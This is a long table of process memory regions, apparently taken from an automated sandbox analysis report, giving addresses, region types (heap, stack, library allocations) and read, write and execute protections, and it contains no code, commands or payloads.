page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
23B472F0000
|
trusted library allocation
|
page read and write
|
||
|
1C56205B000
|
heap
|
page read and write
|
||
|
7FFD33F60000
|
trusted library allocation
|
page read and write
|
||
|
1FDB95F7000
|
trusted library allocation
|
page read and write
|
||
|
1FDB91FB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33E40000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
1FDB91FE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33C62000
|
trusted library allocation
|
page read and write
|
||
|
1C561DA7000
|
heap
|
page read and write
|
||
|
23B356A0000
|
heap
|
page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
1C561D95000
|
heap
|
page read and write
|
||
|
23B4F512000
|
heap
|
page read and write
|
||
|
1FDB9242000
|
trusted library allocation
|
page read and write
|
||
|
23B373D6000
|
trusted library allocation
|
page read and write
|
||
|
1FDD15A0000
|
heap
|
page read and write
|
||
|
7FFD33DF0000
|
trusted library allocation
|
page read and write
|
||
|
1FDB94CD000
|
trusted library allocation
|
page read and write
|
||
|
23B4F905000
|
heap
|
page read and write
|
||
|
AD90D9E000
|
stack
|
page read and write
|
||
|
23B4F8B6000
|
heap
|
page read and write
|
||
|
AD9107F000
|
stack
|
page read and write
|
||
|
7FFD33D30000
|
trusted library allocation
|
page read and write
|
||
|
1C563B45000
|
heap
|
page read and write
|
||
|
7FFD33A92000
|
trusted library allocation
|
page read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
7FFD33ADC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33DD0000
|
trusted library allocation
|
page read and write
|
||
|
23B37401000
|
trusted library allocation
|
page read and write
|
||
|
1C561DC2000
|
heap
|
page read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
23B38F92000
|
trusted library allocation
|
page read and write
|
||
|
1FDB7290000
|
heap
|
page read and write
|
||
|
1C561CA0000
|
heap
|
page read and write
|
||
|
7FFD33D50000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
AD917FB000
|
stack
|
page read and write
|
||
|
23B4F929000
|
heap
|
page read and write
|
||
|
1FDB91F8000
|
trusted library allocation
|
page read and write
|
||
|
1FDB95C4000
|
trusted library allocation
|
page read and write
|
||
|
1C561C90000
|
heap
|
page read and write
|
||
|
1FDB7352000
|
heap
|
page read and write
|
||
|
23B36EB0000
|
trusted library allocation
|
page read and write
|
||
|
1C561DAC000
|
heap
|
page read and write
|
||
|
23B4F7D8000
|
heap
|
page read and write
|
||
|
6BBA8FC000
|
stack
|
page read and write
|
||
|
1C563B65000
|
heap
|
page read and write
|
||
|
7FFD33D50000
|
trusted library allocation
|
page read and write
|
||
|
1FDB8EF0000
|
heap
|
page read and write
|
||
|
1C56205A000
|
heap
|
page read and write
|
||
|
1C561DE6000
|
heap
|
page read and write
|
||
|
23B3551D000
|
heap
|
page read and write
|
||
|
7FFD33CA0000
|
trusted library allocation
|
page read and write
|
||
|
23B373E9000
|
trusted library allocation
|
page read and write
|
||
|
6BBA5FE000
|
stack
|
page read and write
|
||
|
23B38BA1000
|
trusted library allocation
|
page read and write
|
||
|
23B4F8EB000
|
heap
|
page read and write
|
||
|
23B379D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33ACD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD33D40000
|
trusted library allocation
|
page read and write
|
||
|
23B38C2A000
|
trusted library allocation
|
page read and write
|
||
|
1C561DB6000
|
heap
|
page read and write
|
||
|
7FFD33E4C000
|
trusted library allocation
|
page read and write
|
||
|
AD913F6000
|
stack
|
page read and write
|
||
|
7FFD33B7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
B3634CD000
|
stack
|
page read and write
|
||
|
23B36ED0000
|
heap
|
page readonly
|
||
|
7FFD33CC0000
|
trusted library allocation
|
page read and write
|
||
|
1C563B4C000
|
heap
|
page read and write
|
||
|
7FFD33A90000
|
trusted library allocation
|
page read and write
|
||
|
23B391CC000
|
trusted library allocation
|
page read and write
|
||
|
23B36EF4000
|
heap
|
page read and write
|
||
|
7FFD33F54000
|
trusted library allocation
|
page read and write
|
||
|
23B4F76F000
|
heap
|
page read and write
|
||
|
23B47009000
|
trusted library allocation
|
page read and write
|
||
|
1C561DBC000
|
heap
|
page read and write
|
||
|
7FFD33B76000
|
trusted library allocation
|
page read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
1FDD14F1000
|
heap
|
page read and write
|
||
|
7FFD33C41000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33BA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD33CA2000
|
trusted library allocation
|
page read and write
|
||
|
1FDD146A000
|
heap
|
page read and write
|
||
|
7FFD33E48000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
7FFD33AA0000
|
trusted library allocation
|
page read and write
|
||
|
23B35501000
|
heap
|
page read and write
|
||
|
1C561D80000
|
heap
|
page read and write
|
||
|
1FDC90F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33CE0000
|
trusted library allocation
|
page read and write
|
||
|
1FDB917D000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCE000
|
heap
|
page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
7DF4D5BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B373E1000
|
trusted library allocation
|
page read and write
|
||
|
1C561D5F000
|
heap
|
page read and write
|
||
|
7FFD33C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C561DB6000
|
heap
|
page read and write
|
||
|
23B4F4DB000
|
heap
|
page read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
7FFD33F52000
|
trusted library allocation
|
page read and write
|
||
|
23B373CC000
|
trusted library allocation
|
page read and write
|
||
|
1C563B53000
|
heap
|
page read and write
|
||
|
1FDB7300000
|
heap
|
page read and write
|
||
|
7FFD33C90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33F30000
|
trusted library allocation
|
page read and write
|
||
|
1FDB9144000
|
trusted library allocation
|
page read and write
|
||
|
1FDB95C6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D90000
|
trusted library allocation
|
page read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
1FDB90FD000
|
trusted library allocation
|
page read and write
|
||
|
AD9137E000
|
stack
|
page read and write
|
||
|
7FFD33B40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D10000
|
trusted library allocation
|
page read and write
|
||
|
23B3844E000
|
trusted library allocation
|
page read and write
|
||
|
23B4F895000
|
heap
|
page read and write
|
||
|
1FDB7376000
|
heap
|
page read and write
|
||
|
7FFD33E34000
|
trusted library allocation
|
page read and write
|
||
|
23B47063000
|
trusted library allocation
|
page read and write
|
||
|
23B35505000
|
heap
|
page read and write
|
||
|
7FFD33D80000
|
trusted library allocation
|
page read and write
|
||
|
23B36F00000
|
trusted library allocation
|
page read and write
|
||
|
1FDB7394000
|
heap
|
page read and write
|
||
|
1C563B42000
|
heap
|
page read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
23B356F0000
|
heap
|
page read and write
|
||
|
1FDC90E1000
|
trusted library allocation
|
page read and write
|
||
|
23B391F4000
|
trusted library allocation
|
page read and write
|
||
|
23B36FA0000
|
heap
|
page execute and read and write
|
||
|
23B4F490000
|
heap
|
page read and write
|
||
|
1C561DC1000
|
heap
|
page read and write
|
||
|
1C561DC2000
|
heap
|
page read and write
|
||
|
23B4F8EF000
|
heap
|
page read and write
|
||
|
23B354D3000
|
heap
|
page read and write
|
||
|
7FFD33E39000
|
trusted library allocation
|
page read and write
|
||
|
1C561DC2000
|
heap
|
page read and write
|
||
|
1FDB73C2000
|
heap
|
page read and write
|
||
|
7FFD33DC0000
|
trusted library allocation
|
page read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
23B354C0000
|
heap
|
page read and write
|
||
|
23B4EFF2000
|
heap
|
page read and write
|
||
|
23B36EF0000
|
heap
|
page read and write
|
||
|
23B4F54E000
|
heap
|
page read and write
|
||
|
1FDB7330000
|
heap
|
page read and write
|
||
|
B36287E000
|
stack
|
page read and write
|
||
|
1FDB8EB0000
|
heap
|
page execute and read and write
|
||
|
7FFD33B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C563B53000
|
heap
|
page read and write
|
||
|
23B38B35000
|
trusted library allocation
|
page read and write
|
||
|
23B376D7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33E13000
|
trusted library allocation
|
page read and write
|
||
|
1FDB72A0000
|
heap
|
page read and write
|
||
|
1FDB977B000
|
trusted library allocation
|
page read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
1C562050000
|
heap
|
page read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
23B4F634000
|
heap
|
page read and write
|
||
|
7FFD33A93000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD33C72000
|
trusted library allocation
|
page read and write
|
||
|
1C561DCC000
|
heap
|
page read and write
|
||
|
7FFD33AC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D20000
|
trusted library allocation
|
page read and write
|
||
|
1C561E0D000
|
heap
|
page read and write
|
||
|
AD911FD000
|
stack
|
page read and write
|
||
|
1C561DC2000
|
heap
|
page read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
1C561DBC000
|
heap
|
page read and write
|
||
|
7FFD33B50000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B36FA7000
|
heap
|
page execute and read and write
|
||
|
23B4F8D9000
|
heap
|
page read and write
|
||
|
7FFD33D00000
|
trusted library allocation
|
page read and write
|
||
|
23B37416000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33D00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33CF0000
|
trusted library allocation
|
page read and write
|
||
|
B361F93000
|
stack
|
page read and write
|
||
|
23B3706F000
|
trusted library allocation
|
page read and write
|
||
|
1FDD1425000
|
heap
|
page read and write
|
||
|
1FDD1570000
|
heap
|
page execute and read and write
|
||
|
1FDD146C000
|
heap
|
page read and write
|
||
|
1C563B48000
|
heap
|
page read and write
|
||
|
1C561DAD000
|
heap
|
page read and write
|
||
|
1C561E05000
|
heap
|
page read and write
|
||
|
7FFD33CE0000
|
trusted library allocation
|
page read and write
|
||
|
AD9127F000
|
stack
|
page read and write
|
||
|
7FFD33D80000
|
trusted library allocation
|
page read and write
|
||
|
1C561DE4000
|
heap
|
page read and write
|
||
|
1C561D5A000
|
heap
|
page read and write
|
||
|
1FDB9518000
|
trusted library allocation
|
page read and write
|
||
|
23B37458000
|
trusted library allocation
|
page read and write
|
||
|
1C561E06000
|
heap
|
page read and write
|
||
|
23B4F7C4000
|
heap
|
page read and write
|
||
|
1FDC9152000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33B4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD33E50000
|
trusted library allocation
|
page read and write
|
||
|
23B38898000
|
trusted library allocation
|
page read and write
|
||
|
1C561D97000
|
heap
|
page read and write
|
||
|
7FFD33A94000
|
trusted library allocation
|
page read and write
|
||
|
1C561DC2000
|
heap
|
page read and write
|
||
|
1FDB90D0000
|
heap
|
page read and write
|
||
|
7FFD33AAB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33C60000
|
trusted library allocation
|
page read and write
|
||
|
23B4F859000
|
heap
|
page read and write
|
||
|
7FFD33E00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33B46000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33CC0000
|
trusted library allocation
|
page read and write
|
||
|
1C563B41000
|
heap
|
page read and write
|
||
|
23B4F51A000
|
heap
|
page read and write
|
||
|
7FFD33DE0000
|
trusted library allocation
|
page read and write
|
||
|
6BB9FFE000
|
stack
|
page read and write
|
||
|
7FFD33AEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FDB742D000
|
heap
|
page read and write
|
||
|
7FFD33BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD33DA0000
|
trusted library allocation
|
page read and write
|
||
|
23B4F7C9000
|
heap
|
page read and write
|
||
|
1C563B53000
|
heap
|
page read and write
|
||
|
1C561DAC000
|
heap
|
page read and write
|
||
|
1C561DAC000
|
heap
|
page read and write
|
||
|
1C561D75000
|
heap
|
page read and write
|
||
|
23B4F8E7000
|
heap
|
page read and write
|
||
|
7DF4D5BC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
1C561DD1000
|
heap
|
page read and write
|
||
|
1C563B40000
|
heap
|
page read and write
|
||
|
1FDB73BD000
|
heap
|
page read and write
|
||
|
1C561D88000
|
heap
|
page read and write
|
||
|
1FDD14D7000
|
heap
|
page read and write
|
||
|
23B38137000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C561DBC000
|
heap
|
page read and write
|
||
|
1C561D95000
|
heap
|
page read and write
|
||
|
23B38AF3000
|
trusted library allocation
|
page read and write
|
||
|
B361FDE000
|
stack
|
page read and write
|
||
|
1C561DA2000
|
heap
|
page read and write
|
||
|
23B37454000
|
trusted library allocation
|
page read and write
|
||
|
6BBA4FE000
|
stack
|
page read and write
|
||
|
1C561DDB000
|
heap
|
page read and write
|
||
|
AD912FF000
|
stack
|
page read and write
|
||
|
23B36EC0000
|
heap
|
page read and write
|
||
|
23B4FC60000
|
heap
|
page read and write
|
||
|
7DF4F4970000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD33C30000
|
trusted library allocation
|
page read and write
|
There are 429 hidden memdumps, click here to show them.